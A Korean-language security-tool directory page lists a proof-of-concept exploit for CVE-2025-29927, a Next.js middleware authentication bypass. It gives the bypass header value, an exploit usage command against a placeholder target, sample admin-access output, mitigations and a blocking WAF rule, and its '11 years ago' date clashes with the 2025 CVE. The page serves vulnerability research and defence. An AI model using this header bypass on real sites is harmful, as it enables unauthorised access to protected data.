Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-29927-PoC — 여기에 CVE-2025-29927에 대한 간단하지만 효과적인 익스플로잇이 있습니다. | Kitploit
도구/GitHubGitHub/w2hcorp/cve-2025-29927-poc
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingRed Teaming
GitHubw2hcorp/cve-2025-29927-poc

CVE-2025-29927-PoC

여기에 CVE-2025-29927에 대한 간단하지만 효과적인 익스플로잇이 있습니다.

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-29927 - Next.js 미들웨어 인증 우회 (PoC)

이 저장소는 CVE-2025-29927에 대한 개념 증명(PoC) 익스플로잇을 포함합니다. 이는 Next.js의 치명적인 취약점으로, 공격자가 미들웨어 특정 HTTP 헤더를 악용하여 인증 검사를 우회할 수 있게 합니다.


개요

  • CVE ID: CVE-2025-29927
  • 심각도: 치명적 (CVSS 9.1)
  • 영향받는 프레임워크: Next.js
  • 취약점 유형: 인증 우회
  • 공격 벡터: HTTP 요청 헤더
  • 익스플로잇 복잡도: 낮음
  • 인증 필요 여부: 아니요

취약점 정보

Next.js 애플리케이션은 종종 인증 및 접근 제어를 위해 미들웨어에 의존합니다. 이 CVE는 x-middleware-subrequest 헤더가 처리되는 방식의 논리적 결함에서 발생합니다. 이 헤더가 middleware로 설정되면 서버가 요청이 내부 로직에서 발생했다고 잘못 가정하여 미들웨어 기반 인증을 우회할 수 있습니다.

이를 통해 공격자는 자격 증명이나 유효한 세션 없이 관리자 패널, 보호된 API 또는 사용자 데이터에 접근할 수 있습니다.


PoC 익스플로잇

Next.js 애플리케이션이 취약한지 테스트할 수 있는 간단한 Python 스크립트를 제공합니다.

▶️ 사용법

root@kitploit:~
python3 exploit.py --url https://target.com --path /admin [--proxy http://127.0.0.1:8080]

샘플 출력

root@kitploit:~
[+] Sending request to: https://target.com/admin
[+] Using header: x-middleware-subrequest: middleware
[+] Status Code: 200
[+] Response Body (first 500 chars):
<!DOCTYPE html><html><head>...You are logged in as admin...

의존성

  • Python 3.6+
  • requests 라이브러리

대응 방안

  • 패치된 최신 버전의 Next.js로 업그레이드하세요.
  • x-middleware-subrequest를 신뢰 신호로 사용하지 마세요.
  • 보호된 경로에서 서버 측 세션 검증 및 적절한 인증 검사를 구현하세요.
  • 이 헤더의 의심스러운 사용을 차단하거나 플래그할 수 있도록 WAF/IDS 규칙을 추가하는 것을 고려하세요.

WAF 로직:

root@kitploit:~
if header 'x-middleware-subrequest' == 'middleware':
    block_request()

공개 및 크레딧

이 PoC는 지속적인 취약점 연구 활동의 일환으로 W2H Corp.의 Offensive Security Team에 의해 개발되었습니다. CVE 설명에 대한 원본 게시글은 여기에서 확인할 수 있습니다.

도구 다운로드